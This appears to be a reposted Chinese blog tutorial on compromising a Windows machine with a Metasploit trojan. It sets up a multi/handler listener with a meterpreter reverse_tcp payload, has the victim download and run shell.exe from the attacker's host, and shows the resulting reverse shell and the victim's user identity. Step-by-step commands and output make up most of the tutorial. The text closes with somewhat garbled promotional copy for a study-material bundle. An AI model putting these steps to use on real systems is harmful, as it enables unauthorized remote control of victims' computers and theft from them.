Advertisement

2024年网络安全最新【网络安全】 MSF生成木马教程

阅读量:

本文介绍了如何利用Kali开启反向_tcp监听功能的具体步骤,并详细说明了配置过程中的关键点。此外,还描述了客户端运行木马的过程及如何通过meterpreter session获得普通用户权限的操作。文章最后分享了作者的个人背景及提供的一套网络安全学习资料,并附上了相关链接供读者参考。

二、Kali 开启监听

1、开启MSF

复制代码
    ┌──(root㉿Kali)-[~]
    └─# msfconsole

2、使用监听模块

复制代码
    msf6 > use exploit/multi/handler
    
    # 输出
    [*] Using configured payload generic/shell_reverse_tcp

2、设置Payload

复制代码
    msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
    
    # 输出
    payload => windows/x64/meterpreter/reverse_tcp

3、设置监听IP

复制代码
    msf6 exploit(multi/handler) > set lhost 10.3.0.231
    
    # 输出
    lhost => 10.3.0.231

4、设置监听端口

复制代码
    msf6 exploit(multi/handler) > set lport 9999
    
    # 输出
    lport => 9999

5、运行

复制代码
    msf6 exploit(multi/handler) > run
    
    # 输出
    [*] Started reverse TCP handler on 10.3.0.231:9999
三、客户端运行

1、模拟下载木马

http://10.3.0.231/shell.exe

2、点击运行木马

四、获取权限

1、当出现 meterpreter,表示成功入侵

复制代码
    msf6 exploit(multi/handler) > run
    
    [*] Started reverse TCP handler on 10.3.0.231:9999 
    [*] Sending stage (175686 bytes) to 10.3.0.227
    [*] Meterpreter session 1 opened (10.3.0.231:9999 -> 10.3.0.227:58484) at 2024-03-13 14:02:01 +0800
    
    meterpreter >

在检查权限时, 若终端设备为非认证用户访问, 则被获取的权限信息即为非认证用户授权.

复制代码
    meterpreter > getuid
    
    # 输出
    Server username: tomma-PC\tomma

在开始之前,我是一位个人职业发展经历分享者,在职业生涯初期便毕业于浙江省。随后,在华为、字节跳动等知名科技公司积累了丰富的经验,并于2023年加入阿里巴巴集团担任高级岗位(P7)。

意识到许多程序员在寻求职业发展时倾向于通过自主学习来提升技能。然而这种基于个人经验的自学习方法往往难以形成系统化的学习体系导致学习效果不佳且耗时过长容易陷入技术瓶颈难以突破

为此而汇总编制了一套《2024年度最新网络安全完整学习资料集》,其目的在于帮助那些希望自主提升却又感到知识入手困难的学习者们。这份资源也希望能成为您在网络安全领域深入探索的重要参考资料。

img
img
img
img
img
img

平台不仅提供专为小白准备的入门级学习资料和全面覆盖当前网络安全领域95%以上的知识点培训课程,并且通过精心设计的学习路径帮助3年以上经验的小伙伴深入学习和提升技能。

鉴于工作量较大, 本份资料仅提供部分目录截图. 整套资源包括大厂面经, 学习笔记, 源码讲义, 实战项目, 大纲路线及讲解视频, 并于近期开始持续更新中.

需要这份系统化资料的朋友,可以点击这里获取
这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

如需下载系统化资料的朋友,请点击此处访问

全部评论 (0)

还没有任何评论哟~